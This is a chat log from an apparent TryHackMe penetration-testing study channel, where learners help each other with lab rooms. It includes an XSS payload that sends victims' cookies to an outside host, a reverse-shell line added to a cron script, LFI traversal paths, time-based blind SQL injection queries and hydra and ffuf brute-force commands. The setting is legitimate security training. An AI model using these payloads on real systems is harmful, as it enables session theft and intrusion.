#junior-pentester-path

So you did python3 47887.py http://10.10.148.177 and that's what you get? As I just tried it on my own right now and it was working just fine. Have you altered the file in any way?

or maybe i got the wrong exploit?..

No that's the right one

didnt author the file though.

hmm let me try rm and download it again..

try with this | mount -o rw IP:/tmp /tmp/test

I think you didn't put http:// infront of the IP . As I get the same error when I just enter the IP

Oh right!

Had to put http://

Thank you! Merci beacoup!

Gave +1 Rep to @shadow echo

yeah i'm totally lost in this. i tied to put the &x=&api=https://server.website.thm/flag?id=9 but i didn't work

You are welcome 🙂

So what's the full URL you try?

Like this -> python3 47887.py http://10.10.148.177

yeah, it's asking for the flag 9 and i also tried to put url before it

That message was not meant for you 😄

OOPS 😆

take some rest and clear ur midn if u need
https://portswigger.net/web-security/ssrf
u can read further here

look at the hint carefully. It says ' at the end'

like i saw other examples on youtube and understood it but i can't get past this &x= part

oh i love web academy

only root can mount

What is &x= doing?

&x=https://server.website.thm/flag?id=9

The answer is actually in the tasks you did above

if i try to remove the url and just leave the flag it gives me a 504 server error

So again, what will that parameter cause &x=?

where did u run that mount

u must run it from ur attacking machine

to go to the url where flag9 is

You should then reread one of the previous examples in that task, as I think you misunderstood that part.

guys, how did u switch to jack's profile? dll task

yeah still not able to

i understand that &x= will turn it into ?x=

understand the logic, dont try to copy from example 4

understand the structure and apply it

&x=&url=https://server.website.thm/flag?id=9

use runas command iirc

hey guys, anyone can walk me through lfi challenge 3 ?

done mybad tnx

Yes I did but I think I'm stuck

i checked the prev questions about it

i did everything but i failed again

||POST Request ?||

Unfortunately Yes 😄

Anyone around?

dang

I'll come back later then

😄

@steel nymph have you done the XSS challenge?

I created a ticket with the injected script. Waited a minute....nothing on nc

verified my IP and port.

Is it just me or do we keep getting pentester titles, freeze etc repeatedly?

@rapid kite that's how odds work, right?

most have claimed higher rewards, nth left

It's a matter of percentaje

@steel nymph yes

darn it, im one of the unlucky ones i guess :/

https://tryhackme.com/room/tickets2 There are still good prizes available

Or it doesn't update?

doesn't update haha

all 0 claimed for me

Damn

@steel nymph noted. Booting the attack box 😦

same

@steel nymph yeah, not sure why I thought i needed the attack box 😄

can i confirm my command with u? still says cant find a file

||@steel nymph http://10.10.17.62/challenges//chall3.php?file=../../../../etc/flag3 as post request||

sure

Can anyone hit me up with the HYDRA bruteforce of the nmap rooms? its gonna take ages to end

I gotchu

https://github.com/RustScan/RustScan

Like literally it's gonna take 1538 hours XD

Wait

Did I read your message wrong

Or did you edit it :KEKW:

yeah i'm not getting past through it

can someone guide me out of it

Kinda edit, wrote nmap and figured out it could lead to confussion XD

Just the lazie password

Yeah

Nope

said nmap because its near the rooms of nmap

hydra -l lazie -P /usr/share/wordlists/rockyou.txt 10.10.98 imap

its bruteforcing

but

[STATUS] 155.43 tries/min, 1088 tries in 00:07h, 14343343 to do in 1538:03h, 16 active

You can tell

XDXDD

10.10.98?

wait

What the actual fuck

LOL

😄

Okay i guess that was wrong LMAO

how was it even working

ty btw

@steel nymph i think i am still lost, i am sending post request from inspector in my browser

got it for the next time! Ty

Gave +1 Rep to @steel nymph

@steel nymph do you happen to know if the injection has to be on a specific ticket ID? I'm still not getting anything even with the THM capture tool (but it displays my cookie when I view the ticket).

👍

If you sure to use the right payload, I would restart the machine. At first I also didn't receive anything, probably because I had already 5 or 6 tickets in there, but after the restart and creating a single ticket with the correct payload it immediately worked.

@shadow echo ok.
I can see my cookie gets sent when I view the ticket. So it must be the correct payload. right?

Should be, yes.

Can I Dm you @steel nymph ? still i cant make it work

hack the planet

@shadow echo @steel nymph finally got it! Thanks for the help

Gave +1 Rep to @shadow echo

do anyone got the last flag of sq;_injection room

can you help me out

I have find the table_name

what should I do after that

how were supposed to know this? i tried looking up the referenced GitHub page and I didn't see it there either.

Task 8

level 4

ahh. it IS in task5. i only looked up until task4 since they said it was the same machine

thanks

Gave +1 Rep to @steel nymph

blind sqli-time based

So close

Task 4 of win privesc

Just gotta keep pushing through

SSRF is driving me nuts, when submitting a request the &x= is not changing to ?x=

what should i do

i am

it stays the same

Stuck on LFI Challenge Task1
trying DEV Console>Network. Changing Method to POST and Query String: file=../../../../etc/flag1

But, no luck with error or flag. any clue?

&x= will work and check your url read the &x= part again

I am putting in on URL section next to Method

/challenges/chall1.php?file=../../../../etc/flag1

okay

need space

file=*../../../../etc/flag1

after parameters always one space

thank you @steel nymph 🙂

Gave +1 Rep to @steel nymph

why?

I've never heard anyone claim that and I've never put a space like that

what space

why space

man i am learning alot, fuck uni

THM for da win

thank you @steel nymph is the best

Gave +1 Rep to @steel nymph

Thanks @steel nymph

Gave +1 Rep to @steel nymph

nice thanking people gives them rep

hahah

Which button would we choose to send an intercepted request to the target in Burp Proxy?

hi
in linuxprivesc room of junior-pentester-path i cannot find the answer of this question What vulnerability seem to affect the kernel of the target system? (Enter a CVE number)
i searched in exploit-db and i found 2015-1328, but it seems to be incorrect

File Inclusion Task 4, Q2.... am just not getting what to do...cant seem to figure out what the file is with includes. Help plesae

you need to write it with CVE-2015-1328

ow thankssss

and i've got one more question

in protocols and servers room, i cannot connect to telnet via this command:

telnet ip 80

it says that your connection is closed by foreign host

PM

anyone ?

did I miss something? (wouldn't suprised me)
I cannot seem to find the user/pass to get on the windows privesc box on task2

thanks, now i feel lame for even asking, haha

my password file had that password in it, i just didn't try that user 🙂

well i wanted to ask before i used a bigger file

i think that it would be the forward button, although i dont have it open right now so i cant verify

o

ok

@steep bolt @modest arch I also got that info twice Tickets for this room already awarded These time it happened with Passive Reconnaissance room, I've tried to reset room progress after that message but the same info was shown. Maybe it gives you tickets you already have ?

It is still giving tickets, but will not show you what one

so when you see this notification, just go to the Tickets on your public profile and check

Hey guys, I'm having issues with the LFI Task 8 - Challenge 2. I've tried searching through this room and I've managed to change the cookie and can view the warning messages, however, I've tried variations of the path as the cookie's value and I'm not making any progress. Anyone have any hints?

@steep bolt but I checked ticket table and there was no new tickets ...

maybe you got again 1 day streak freeze and 7 day streak freeze?

Hi guys! How do you log with Jack's account in Windows Privesc, task 5?

probably, thats is the case. But I cant be sure about that.

I got like 10 tickets of 1 day freeze...

I did try the same path with and without the nullbyte to remove the .php that it's adding, but no matter what I try I don't end up with a flag

Will do! Gonna try a couple more things first real quick and if that doesn't work I'll do that. Thank you!

Gave +1 Rep to @steel nymph

Me too but you know. You start the room, you make it, then you check your tickets, and site tells you that "Tickets for this room already awarded". So that kind of a message is weird ...

This cookie task is giving me a headache

Im all out of options

For Windows Privesc, the command "sc stop dllsvc & sc start dllsvc" does not work, because "&" is not allowed. I tried to break the command into two commands but nothing happened except it has created two new files named "stop" and "start". Also, I can't try to log as Jack, I can only try to log as "Administrator" or "admin_account".. i'm a bit confused! ^^

are you trying it in powershell or the cmd prompt?

I'm trying in powershell! should be in cmd prompt? ^^'

sc is a cmd only command so yes. also for logging in, try using the flag -credentials "" when running something in powershell

i dont like how windows splits powershell and cmd commands, personally. gets annoying

oh wait it should be -credential "" my b

linux ftw

absolutely

thanks! I will try! I thought all the commands were throught powershell.. !

nope, they're not

powershell is scripting, and cmd.exe is for actually controlling the computer. its funky

I mean, powershell can control the computer

Yes

I have...maybe im not understanding it

Need some clue with LFI flag3.
Trying Change method to POST on inspector and input ?file=../../../../etc/flag3%00 on form. But, no luck its showing Warning: include(?file=../../../../etc/flag3%00.php ! Why its showing .php after using Null Bytes!

you are still using .php

use the burpsuite interceptor and inspect it there, you'll see whats the issue

I am not good at using burp yet

cookie value of admin + whatever else i try just not working lol....

why don't you try by removing admin part and try....

I'll try and give you more steps to get through it || so when you grab it with the interceptor, you can pass it over to the repeater. in the repeater, you can see what's getting sent and how it was changed from your original input. you can change it in the repeater and then press the "forward" button to send it through ||

Hi guys, I am stuck in SQL-Injections. I'm not able to find the right query in "Blind SQLi - Time Based" . May someone help?

where have you gotten with it so far?

i dont get it lol

damn I am solving the https://tryhackme.com/room/protocolsandservers2 lab

try to play with cookie

just change admin to some different thing and see what happens

hydra brute forcing for 15 min

use a wordlist instead of bruteforcing, at least for these that should cover it

I am brute forcing with a wordlist

what do you mean?

UNION SELECT SLEEP(5), 1,2,3 from usernames where username like 'a%'--

oh then thats not brute forcing

oh

it is the dictionary attack right

and what you get? Time?

so the point of it is that if it's correct, it will wait 5 seconds. so you go through each letter there to see whether it's correct or not. so go through 'a%', 'b%', 'c%' and then continue with 'aa%' and then you'll know whether or not its right

0.001, don't know if this is right

yeah it is

bruteforce would take forever with thm so its not worth it

anyway, what wordlist are you using? 15 minutes is a long time

for THM that is

Who available for dm regarding LFI Task 8?

I am using the rockyou.txt

for every lab .D

I figured it out but not sure why it is how it is

I also have the same question as @hexed coral

Seems like an incorrect # of paths

huh, 15 minutes is a while but it seems like you're doing it right

I just finished lfi 2 stack on 3

|| hydra -l lazzie -P /usr/share/wordlists/rockyou.txt 10.10.125.147 imap ||

this is the code

I dont think there is smth wrong with this

is it using cpu or gpu as a source?

put it in || spoilers || so that people who don't want the answer don't see it

but that looks fine, just seems like its taking oddly long. is imap on a nonstandard port?

like does it give you any response

has anybody had trouble accessing the acmeitsupport webiste from their attackbox?

sorry.

yeah it is trying

double check the port that its running on, or if you just spun up the box wait another minute

you are using sleep(5) for a reason... Read the explanation well and you will see why

well, from what i can tell it looks right

yeah, but sometimes I don't get any response.

and to access it, you should be able to just pull up a browser and go to acmeitsupport.thm, right?

think on it as a game of guessing. first you will guess one parameter, then, the next one. The difference on the response is the indicator which tell you if you got something or not

if it’s running on a nonstandard port it would be <ip>:<port>/<page>

thanks

np

How do you find what tickets you have already earned?

go to your public profile page, the click tickets

@sterile crescent thank you for that. I've been pulling my hair out on the LFI room and used up all my brain for tonight lol. cheers.

Gave +1 Rep to @sterile crescent

I was able to figure out LFI Task 8 Flag2, but I'm confused as to why it's ||4 directories deep and not 3 (going off the current path shown)|| can anyone help clarify?

I got it by mostly guessing, but I'd like to understand it

type on the cookie something different and check what the error shows

@red wraith thanks for the help

Gave +1 Rep to @red wraith

Yeah. I got the flag, but the error implies that the directory is only ||3 deep, meaning I'd only need ../ 3 times, but I needed 4.||

I dont have the exercise loaded now,|| I think that it had two different URIs||

I guess I'm mostly just not clear on why the 'current path' isn't what I use to determine how many directories I need to move up. The current path it's showing is one fewer directories than I actually needed to move

|| when redirecting out like that, you need to add an extra one to get it to move out of the first directory (the file). its a weird little interaction ||

Oh....

yeah

its a really weird funky thing, but since the file isn't directing you out, you have to drop out the file first

I may have just been staring at this too long, but I'm not sure I understand what you mean by the file not directing me out

its a programming thing. normally when an app is reaching out for a directory, it just reaches out on its own. you have to exit the file yourself

so one set of ../ takes you from /var/www/html/file.html to /var/www/html
if that makes sense

good explanation

when you factor in the file into your current path, it takes one more to exit out

It does. Thank you for clarifying that for me. Spent 2 hours trying to figure it out and got it by guessing and that confused me more ahaha

Gave +1 Rep to @sterile crescent

no problem, its weird and hard to know unless you've done programming and path traversal in apps

Is it always one additional to exit the file? Since the page itself is chall2.php, I need to exit out of the page, whereas if it wasn't the open page I wouldn't have to. is that correct?

it’s normally one additional to exit, but it’s not always

I recommend starting with just one back and going up until you hit root

but there’s always an open page, the default will usually be something like index.php

Understood. Thank you again! You saved me from confusion and frustration!

Will the tickets box ever update with how many of the various rewards were claimed?

i'd like to know if OSCP / JPT have already been claimed

I don’t know. I recommend worrying about that when you potentially win

What issue?

what lol

what's that supposed to mean

doing the stuff is more important than winning anything, and it’s unlikely you win anyway. I didn’t end up getting anything so it was just worry for nothing. just how I see it though

Thanks @steel nymph for all the valuable inputs today!

Gave +1 Rep to @steel nymph

Hmmm, doing exercises is more important than career boosting certs

Nah I'll still go for the certs thank you

For sql injection room, Task 8 (Blind SQLi-time Based) : I think I found the room byhaving a 5 second delay after

referrer=admin123' UNION SELECT SLEEP(5),2 where database() like '[MY_ANSWER]';--

but I dont gain access to the next site

the point is you keep doing that to find the database, table, users, and all that. then you get the user and password as an output after you get all of it

its a lot of trial and error, and time

son of a ....

Thanks @steel nymph @sterile crescent

Gave +1 Rep to @steel nymph

Thanks @sterile crescent

good luck

damn does this bot not give reps to multiple people

robocop doesnt want me to get rep

rip

what does rep even do

nothing lol

welp doesn't really matter then

Okay I the robots.txt link and the sitemap.xml link are not loading

in content discovery? anyone else experienced this?

But the rest of the sites are working?

yeah

the robots.txt file was just working for me like 20 min ago

im connected to openVPN

i wouldnt know of anything causing that issue, you can always restart the computer though

Well I did it through a VM and I restarted the VM but it still happening

i mean the target computer

Is openvpn running directly inside your VM or on your host machine?

inside the VM

You could give that one a try: sudo ifconfig tun0 mtu 1200 in case it doesn't solve your issue just put it back to 1500.

not working

Then you might want to restart the target machine, or try clearing your browser cache.

still stack with lfi flag 3. may i get some clue to pass it through?

Depends on what you have achieved so far. Are you able to bypass the filter so that it's requesting /etc/flag3 instead of etcflag ?

getting this : ?file=../../../../etc/flag3%00.php

as error

sending POST request through dev console>Inspector and putting ?file=../../../../etc/flag3%00 as input on form

Hello everyone,
I am in the fileinc room on task 5. I believe my brain is shorting out but I can not figure out the 2nd question. For which function is causing the directory traversal. any help would be appreciated. Thanks

:O

yeah

thanks

I think I need a break after that one. Thank you lassi

Gave +1 Rep to @steel nymph

can't figure out!

I would try to check that request in the network tab. And then right click on it -> edit and resend. So you can check the request body again.

So did you check it in the dev tools yet?

yes, trying on dev tools

but no luck

So how is your request body looking like?

Method: POST
Query String: file=../../../../etc/flag3%00

There should be no query string field if you are making a post request.

I tried from Inspector eariler

Dev Tools>Network>Edit & Resend>New Request

Right, so if you change the method to POST, the query string field should disappear. So you have to put your payload into the request body field.

I am changinf URL too

got it! I was putting ? thats why query string show up. Now putting payload on body, but, did not get the flag yet

So what did you put in the request body field now?

file=../../../../etc/flag3%00

Alright, so there is one more thing for you to figure out now, as I assume the initial request that you edited in the network tab was a GET request, you are missing a header now. So you need to figure out what header you have to add for the POST request.

It is POST as I see

For example you could open a new tab and make the post request the way you did it previously, by using the inspector to change the GET to POST and then compare the header.

Done it was fun.Most hard and enjoyable was LINUX PRIVESC

Or you google "POST request header"

Hey @here can I get some help with the last part of Task 6 on the Windows PrivEsc? || I'm having a hard time finding what the name of the executable is supposed to be, I assumed it would be unquotedpathservice.exe but that's not what it wants from me.|| Any ideas?

Edit: I ended up just brute forcing it but would appreciate insight on how to actually get it

OH

I mis read that at first. Thank you

Thank you!

Gave +1 Rep to @shadow echo

Man, my freaking payload doesn't wanna work 😢

nvm, when in doubt in windows just swap between cmd and powershell

always does magic

Do I need to host a file on a website to execute execute the hostname command via RFI?

yep, but I am using a shared IP, will it work?

Yeah. Just python -m http.server, and usually the box already has something on port 80 so python -m http.server 1337 or something to specify the port

As long as you're on the VPN you'll be fine. Don't use your external IP

okay

If you're using attackbox use the IP at the top of your terminal 🙂

ok... I am using vpn

should I make a bash script?

to know the hostname?

okay

can somebody help me with linux privesc?

i tried to privesc with at and base

and didnt worked

i found passwords in shadow file

but is encrypted in sha512

and i cannot decrypt i dont know how

task 7

yes i get that flag

]

i tryed a lot of ways

yea now im trying that

now worked

i tryied from another site and didnt worked

Trying to inject this text file for RFI from my local server http://0.0.0.0:9090/hn.txt no luck....

I finally got past the phone verification.. I'm having the same issues as you capt. jack

Have you verified that if you put that path into your browser you are presented with the file?

yea

it live on that link

0.0.0.0 ? How should that work ?

For me, I can hit the file via my local ip/filename but all I get from the playground is "File Content Preview of http://10.0.2.15/rfi.txt" then nothing

I am using updog

0.0.0.0 usually means all interfaces

No clue what that is, but if you try to include that URL in the RFI, how should that get resolved to your machine/ updog thing?

Am I using this URL correctly then? ||http://10.10.128.242/playground.php?file=http://10.0.2.15/rfi.txt||

yes

so it should work, right?

If I'm right, if you ping 0.0.0.0 from your webserver, you should get the loopback ip address returned

So I don't think it'll work

http://192.168.10.107:9090/hostname.txt this one should work then

I can access this server from other machine of my nextwork

I'm trying to do the authentication bypass room and the ffuf command doesn't seem to be working. I was using the provided command ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/signup -mr "username already exists"
Also it takes about an hour for it to fully run

and outputting to a file doesn't yield anything

Hey there on a side note, why is it that when I use a file from either google drive or drop box not being recognized when sharing them as raw links. From my understanding they are servers too right? Is it because it has to do with the HTTPS nature of the share link, can you please clarify?

For me, I don't think the external server is able to reach my file as when I attempt to reach the file locally, the terminal hosting the server state something like "GET /rfi.txt HTTP/1.1" 200 -"
But when I try from the playground nothing appears, so that to me states that the playground can't reach my file

Definitely need help with this :/

what will be the content of the file?

that txt file

Get a meterpreter session on the target machine.

you can use xhydra

thats a good idea, but this room is for RFI we should try RIF

I tried the example: <?PHP echo "Hello THM"; ?>

But got nothing, then I removed the echo command and tried hostname with no change

i beleave you can and it downloads the txt file not html

Yep able to curl

same here, but no luck.... in my case the page taking time to load but, did not getting any error messege. don't what that mean

nm

Genius

So you and I are literally in the exact same pickle -_-

First of all I would make sure that the file you are hosting is accessible. So therefore just open a new browser tab on your machine and enter the URL http://10.0.2.15/rfi.txt . In case you can access it, you can start trying to do the RFI on the playground website.

Tested it and I can hit it just fine, I even get feedback on the terminal running the webserver that the file was accessed.

yes, i can access the file from a new tab, its downloading

When trying the fri website, I get nothing back and the terminal doesn't show any sort of access attempt

Okay, so as you know the file is accessible you can start trying to do the RFI. I can't remember at the moment on how the task was done, but I think it wasn't too complicated.

http://10.10.182.244/playground.php?file=http://192.168.10.107:9090/hostname.txt

Lfi + zap + fuzzer = best friend

I think I tried the box as well as url, but I'll give it another shot

Nope, same issue whether in box or url

||<?PHP hostname; ?>||

^^^payload

Can I try to access that file? As I don't think that's working

So if I understand you correctly, I literally need to ||put http://10.0.2.15/rfi.txt into the box then click "Include"||, yeah?

Its my device IP. I run updog server on my device. And, its showing 0.0.0.0:9090 as my server address. 192.168.10,107 is my device ip. and, i can access the file (http://192.168.10.107:9090/hostname.txt) from other device on my network.

Yes, because you are on the same network as that other device.

Whats your tun0 ip? Is the one you use

Well I'm doing it correctly, but shouldn't the server be able to access it as I'm on the same vpn network? Or will I need to spin up an attack box vs using my kali box?

how can I host it on thm! I am using vpn, is not make my device as a device of thm nextwork?

same qsn

also, what will be the content of the file?

capt, did you connect to THM openvpn?

yes

I think as like Jabba said, 0.0.0.0 means all interfaces, you simply have to change the 192.168 IP with your tun0 IP. Provided that you are hosting it on the machine that's connected to the THM network.

you should be using your tun0 as ip

If we didn't have the vpn up, we shouldn't be able to access the playground at all

how can I find my tun0 IP

I'm sorry if I'm being obtuse, but I'm happy to do whatever you need to make progress

ifconfig is depreciated

did it earlier and got 192.168.10.107

Use ip a s tun0

got it!

You got that IP as tun0 IP or you mean as eth0 IP ?

Progress! I can see the requests from the playground server now, but I'm guessing my payload is incorrect as I'm not getting the hostname

what was your payload?

ip a s tun0
4: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 500
link/none
inet 10.9.3.225/16 scope global tun0
valid_lft forever preferred_lft forever
inet6 fe80::826f:ff2:73a9:aae5/64 scope link stable-privacy
valid_lft forever preferred_lft forever

not working

and on ifconfig it sowing inet 192.168.10.107

I really appreciate the help! Seriously, thank you very much

Gave +1 Rep to @steel nymph

which IP works for you?

What is not working? I do see your tun0 IP now?

is this one? 10.9.3.225

Yes

The tun0 ip from ifconfig

That seems more correct

Test if you can access the file from your browser using that ip

both are same IP 10.9.3.225. and I can't access the file from my browser

On the attack box, spin up a server on a port of your choice, the use ifconfig once to check your eth0 address. Once you copy the URL paste it in the playground ans the file should execute. This worked for me on the attack box

i am going to try attackbox

content will be just hostname, right?

No, it's something else, I'm working it out atm

Got it!

congratulations

I am still stuck!

@viral token The payload I posted earlier is almost correct, you gotta do something to execute the hostname command

ok

i am trying from attackbox, but, couldn't get the file!

its showing same 0.0.0.0 on attackbox too and guess what there is no tun0 ip attackbox.

Again, like Jabba said, 0.0.0.0 only means all interfaces. And on the attackbox you are not being connected to the vpn (because there is no need for it as you are on the same network as the target machines) and therefore you have no tun0

I don’t catch

ok. thank!

Gave +1 Rep to @shadow echo

Any chance someone can correct knows why ffuf isn't working in the authentication bypass room? I'm using the example but for some reason it isn't finding anything and is also taking an hour at a time to run

This is the command: ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.140.70/customers/signup -mr "username already exists" -o valid_usernames.txt

The output file doesn't list anything useful mostly just configuration stuff.

I think you don't need the last output part

That's just for outputting to a file

otherwise it doesn't seem to output anywhere

Just kinda ends

{"commandline":"ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d username=FUZZ\u0026email=x\u0026password=x\u0026cpassword=x -H Content-Type: application/x-www-form-urlencoded -u http://10.10.140.70/customers/signup -mr username already exists -o valid_usernames.txt -o valid_username.txt","time":"2021-10-26T01:16:37+01:00","results":[],"config":{"autocalibration":false,"autocalibration_strings":[],"colors":false,"cmdline":"ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d username=FUZZ\u0026email=x\u0026password=x\u0026cpassword=x -H Content-Type: application/x-www-form-urlencoded -u http://10.10.140.70/customers/signup -mr username already exists -o valid_usernames.txt -o valid_username.txt","configfile":"","postdata":"username=FUZZ\u0026email=x\u0026password=x\u0026cpassword=x","delay":{"value":"0.00"},"dirsearch_compatibility":false,"extensions":[],"filters":{},"follow_redirects":false,"headers":{"Content-Type":"application/x-www-form-urlencoded"},"ignorebody":false,"ignore_wordlist_comments":false,"inputmode":"clusterbomb","cmd_inputnum":100,"inputproviders":[{"name":"wordlist","keyword":"FUZZ","value":"/usr/share/wordlists/SecLists/Usernames/Names/names.txt"}],"inputshell":"","matchers":{"regexp":{"value":"username already exists"}},"maxtime":0,"maxtime_job":0,"method":"POST","noninteractive":false,"outputdirectory":"","outputfile":"valid_username.txt","outputformat":"json","OutputCreateEmptyFile":false,"proxyurl":"","quiet":false,"rate":0,"recursion":false,"recursion_depth":0,"recursion_strategy":"default","replayproxyurl":"","stop_403":false,"stop_all":false,"stop_errors":false,"threads":40,"timeout":10,"url":"http://10.10.140.70/customers/signup","verbose":false}}```

it doesn't echo out the output?

Nope

That's what it outputs but that doesn't give any usernames

it will show you the output on the screen

and, if you want to get a file read ffuf man page

It's simple just look at the whole problem

remove the output part or fix it with proper fomating. you can't out put text file. as well as you needs to give ffuf command on file formating. Read man page or help menu will help

wait

I got it to work now

Yeah

I restarted the machine and that did the trick for some reason

Only took 5 seconds to run rather than the hour I've been dealing with so far

are you guys working on the Fileinc challenge seeing a 405 error?

I was trying to do the auth bypass room

The room cross-site scripting task 8 I am not recieving any cookie neither in listener nor in tryhackme request catcher.
Btw by tapping the ticket ID I get my own cookie but we need the support-staff cookie.
Could anyone please help??

I just forgot to click to redeem tickets, did I have to click them

Yes

yeah maybe you have to reset the room and answer again to all the question then you will be prompted to click them again

windows privesc can someone explain how to download the powersploit on the web based windows machine im suppose to exploit i get nothing but errors

Anyone having issues with Windows PrivEsc DLL Hijacking - it will not let me start the service

@tardy phoenix I was getting the base64 encoded session cookie, decoded it, but when I submit the answer it will not accept it. I was using the netcat method on my vm with the browser used also in my vm.

There is this line in active recon (Task 6 final paragraph - Last line) "You can find a recording of the process below. Note that the listening server is on the left side of the screen." (I think there is no video/recording?)

Is anyone else running into this in the XSS room? I've restarted the AttackBox twice just in case but to no effect.

What is uname password for windows priesc room

The last 1

how much time until the giveway is over?

27th

Hello guys, I'm doing the LFI room and I'm sooo stuck at the third challenge

the one where everything seems to be filtered

Do you have any hints?

You want hint?

yep

Hint request

is base on time zone?

Are you stuck on the Lab3 challenge?

yep, the third challenge

https://tryhackme.com/room/winprivesc - There's a bug with Task 5 - you cannot start or restart the service "dllsvc" you get an error message

how did you try?

i managed to get /etc/passwd by sending the parameter in the POST request

are you using dev tools or burp?

how do you send POST request?

Burpsuite and curl

curl -X POST -d 'file=../../../../../etc/flag2%00' http://10.10.187.133/challenges/chall3.php

try to play with directory location

and, you can try dev tool

I was literally retrieving the wrong number of flag

Now I got it

congrats!

what am i doing wrong?

maybe check your path properly....

what would be the path?

Post ||/challenges/index.php/etc/flag1||

???

@viral token

read LFI tutorials again from the dot-dot-slash section @sullen perch

Did not getting nc incoming by using this xss script: </textarea><script>fetch('http://10.9.3.225:9001?cookie=' + btoa(document.cookie) );</script></textarea>

need some clue

I had an issue with this too and eventually just restarted the machine, used the listener at 10.10.10.10 and made a new ticket.

No issues with netcat with any other room, so I'm not sure why it went weird

remove btoa() and retry it

just document.cookie should work

I tired THM request catcher and got the stuff-session

may be something wrong with nc connection

how could i get base64 if I remove btoa!

btoa() command base64 encodes the victim's cookies.

probably i didnt encode lol

should also work with with btoa() too

👍

Complete noob here. Doing the JR PenTester path and stuck on the 'Authentication Bypass' (Task 3). Can anyone offer assistance/walkthrough to offer a different perspective in it?

The Brute force one? I believe it's almost identical to the information in the task, substituting your machine IP and wordlist location. Do you have wordlists ?

I think so... I am just stumped on how I arrive at the solution. I am probably thinking about it too hard

check out your wordlist location if you are using one

also, make sure the terminal is in the same directory as the valid_usernames.txt file.

Can someone help I’m missing something

Maybe re-reading this paragraph?

can someone send link of hack me?

need help for the room Protocols and Servers 2

ok

Linux PrivEsc task 9 Privilege Escalation: Cron Jobs. I added the bash in target backup.sh and then opened the listener from Linux. But the job seems not running. Anyone can help?
The backup.sh file contains:
cd /home/admin/1/2/3/Results zip -r /home/admin/download.zip ./* #!/bin/bash -x bash -i >& /dev/tcp/<my ip address>/1111 0>&1

did you make it executable?

Yes, I chmod 777 backup.sh file

It shows ./backup.sh: connect: Connection timed out

after executing the backup.sh

Which IP did you put there?

Tun0?

I put eth0

eth0 inet

Are you using the attackbox or THM Kali? Or are you using your own machine?

I am using Kali Linux VM

Ok, so you need to use your tun0 IP. That's the only address that the target machine can talk to you using

Got it. Thank you

👍

Can any please help me in
Protocols and Servers 2 : TASK 6 question plz

When I enter this command (hydra -l lazie -P /usr/share/wordlists/rockyou.txt Machine_ip ssh) as told in explanation it should not take more than 5 min

It has been 14 min now

O sorry I did not see it. My bad

Thanks a lot I was looking since 1 hr

Gave +1 Rep to @steel nymph

I didnt get ticket after completing the room..

oh

I don't think so, I've had that message before and not gained any tickets

Hmm maybe I guess

hello, I need help with Windows priv escalantion room task 6. It says: "Obtain Administrator privileges on the target machine. What is the content of the flagUSP.txt file?"

I have already established a meterpreter session succesfully, but when trying to escalate using "getsystem", all of the methods fail

I have also used all of the available exploits that appear when I use "search uac" but none of them seems to work :(

sb has got the room complete?

Those methods are for when you already have admin privs

and for when you dont have admin privs?

what should I do?

Escalate

yeah but how

Help with flag2 please.
Using Burp I've changed the cookie value to|| "admin"||. I've input invalid cookie values to see current path - ||/var/www/html/chall2.php||.
So I changed URL to - ||*http://10.10.57.78/challenges/chall2.php?file=../../../../etc/flag2*||
Other than the two values "Guest" & "admin" values, I'm unsure how else I could alter cookies to find the flag.
Does Content-type: also need to be added on this challenge?

look at correlation between cookie value and file content preview

Is there an ||admin|| directory?

That's a negative.

any help with this message? @full escarp @left cove @upper quarry @drifting drum

Thanks @steel ice I got it.

Gave +1 Rep to @steel ice

dm me

Hey guys, I am stuck in the authentication by pass room of the jr. Penetration tester path where we have to bruteforce and use ffuf and find the username and password .
I know am writing the correct command. When I use the filter -fc 200, I can see that one matching credential is found, but when I use the same command and use ">> filename.txt" to fetch the output on the txt file. There is no output seen there

Can anyone help me with this?

What am I doing wrong here ?

Use ffuf -h to see what flag you have to use to write output to a file

When I don't use the -fc 200 switch to capture all the http 200 msgs, and then use >>filename.txt to print the output. At that time it works.

Maybe post the full command you are using in here. But that would indicate that you are only getting 200 responses and that's why you get output, but all the responses that are 200 are not of interest in that case.

thank you...I returned to this and found this to work for me too....F..... CVE-(year)-(number) format seems to work for anyone on Task 3 of Linux Priv Esc.

Gave +1 Rep to @lean ridge

Hi. I need help with Linux PrivEsc room task 6. The 'simple c' code doesnt give the root permission. And i already research on google but no luck.

Hopefully someone can help me.

Yes! same as. I rebooted the vm twice and no joy. Anyone else?

You shouldn't need any code for task 6

How can i find frank pw hash? I have no idea and found zero resource about it

gtfobins

Look at what you can use sudo with. If you don't know how to use those to your advantage check gtfobins

As far as I know you don't need to crack it

lol my bad
i mean the plaintext password xD

Thanks!!!!!!

Gave +1 Rep to @full escarp

Hi i am stuck on same VM machine don't have gcc compiler installed and not can install any new due not root permissions any help here ?

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

Ya as they said, and i also tried it. Until the last question, u do not need to compile anything

OK now i see and understand thanks so much !

you got it?

you got it?

yes

Hi, at the cross site scripting room I used the supplied xss payload, but I did not get a response even from myself I get no response I used the log catcher and nc on my local machine any ideas?

the Javascript console might tell you why it is not working

It says Type Error and mixed content blocked

This it stands right before the task </textarea><script>fetch('http://{URL_OR_IP}?cookie=' + btoa(document.cookie) );</script>

It's the last Task 8

can anybody give me a tip to where the flag is on this question:

Obtain Administrator privileges on the target machine. What is the content of the flagUSP.txt file?

feel free to DM me, thank you

I forgot to tell in this error it also says NetworkError when attempting to fetch resource

thanks I just found it, everytime I do a search like this it kills my shell though for some reason. Or I'm just not patient enough to let it finish

Yes and with the tun0 ip

Hey may I get some help with a NTLM hash?

It asks for Pirate's hash and i did the hashdump, got rid of the user and the PID but the NTLM isn't working

I know i must be doing something wrong but i dont fall for it rn

Yeah the LM:NT

@steel nymph do you have a working payload? I found a slightly different way to get the cookie, but would be really interested how to bypass this browser blocking, if it is possible

Imma check it out anyway, ty!

</textarea><script>fetch('http://924e61e91ca6bd7fba93221c0ddb2c95.log.tryhackme.tech/' + btoa(document.cookie) );</script>

